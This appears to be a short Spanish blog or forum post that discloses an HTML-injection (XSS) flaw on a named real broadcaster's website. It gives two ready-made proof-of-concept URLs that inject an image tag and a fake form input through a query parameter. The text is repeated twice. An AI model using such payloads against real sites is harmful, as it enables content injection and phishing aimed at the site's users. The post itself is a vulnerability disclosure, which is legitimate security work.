Hola amigos de regreso por estos rumbos con un pequeño hallazgo que encontre culpa de mi curiosidad.
esun problema de XSS en donde podemos incrustrar codigo HTML en el sitio en mención, a continuación el ejemplo:
1- http://www.rtve.es/television/tve-internacional/parrilla/?idpais=%3Cimg%20src=http://psx-scene.com/forums/images/news/no_hack.jpg%20/%3E
2- http://www.rtve.es/television/tve-internacional/parrilla/?idpais=%3Cinput%20type=%22text%22%20size=%2215%22%20maxlength=%2230%22%20value=Nombre%20name=nombre%3E
Error inofensivo?, eso depende de la imaginación que pueda tener el atacante y de sus intensiones tambien.
Hasta la PRoXYma.
esun problema de XSS en donde podemos incrustrar codigo HTML en el sitio en mención, a continuación el ejemplo:
1- http://www.rtve.es/television/tve-internacional/parrilla/?idpais=%3Cimg%20src=http://psx-scene.com/forums/images/news/no_hack.jpg%20/%3E
2- http://www.rtve.es/television/tve-internacional/parrilla/?idpais=%3Cinput%20type=%22text%22%20size=%2215%22%20maxlength=%2230%22%20value=Nombre%20name=nombre%3E
Error inofensivo?, eso depende de la imaginación que pueda tener el atacante y de sus intensiones tambien.
Hasta la PRoXYma.